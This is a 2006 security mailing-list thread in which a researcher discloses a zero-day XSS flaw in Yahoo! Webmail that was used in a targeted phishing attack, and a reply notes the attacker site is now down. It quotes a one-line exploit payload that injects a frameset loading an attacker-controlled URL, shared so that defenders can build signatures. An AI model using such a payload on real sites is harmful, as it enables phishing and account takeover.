Dailydave mailing list archives
RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "El Nahual" <nahual () g-con org>
Date: Tue, 18 Apr 2006 12:47:10 -0500
Whoa dudes are fast ... Site is down now .. since it tries to connect to another IP =) -----Mensaje original----- De: Cesar [mailto:sqlsec () yahoo com] Enviado el: Lunes, 17 de Abril de 2006 02:15 p.m. Para: dailydave () lists immunitysec com Asunto: [Dailydave] [Argeniss] Alert - Yahoo! Webmail XSS Hi. I just got a targeted phishing attack to one of my Yahoo email accounts, what it´s insteresting it's that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm contacting Yahoo right now but in the meantime I thought it will be good to provide some bits because the seriousness of this . When you browse a message on Yahoo! Webmail the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/ ,it's interesting that the address bar at IE dosn´t refresh to show the actual URL, you can only see the redirection to http://w00tynetwork.com/x/ on IE status bar if you have it visible. I don't know if this vulnerability is being exploited on the wild since it was a targeted attack. Here is an extract from the exploit so you can start build some signatures, filtering, etc. ----------------------------------- (java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>')) ----------------------------------- I will provide full details later when Yahoo! fix the issue. If security vendors are insterested on full details plese ask for them at info>at<argeniss>.<com Cesar. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Current thread:
- [Argeniss] Alert - Yahoo! Webmail XSS Cesar (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS Dave Korn (Apr 18)
- RE: [Argeniss] Alert - Yahoo! Webmail XSS El Nahual (Apr 18)
- <Possible follow-ups>
- RE: [Argeniss] Alert - Yahoo! Webmail XSS C programming List (Apr 18)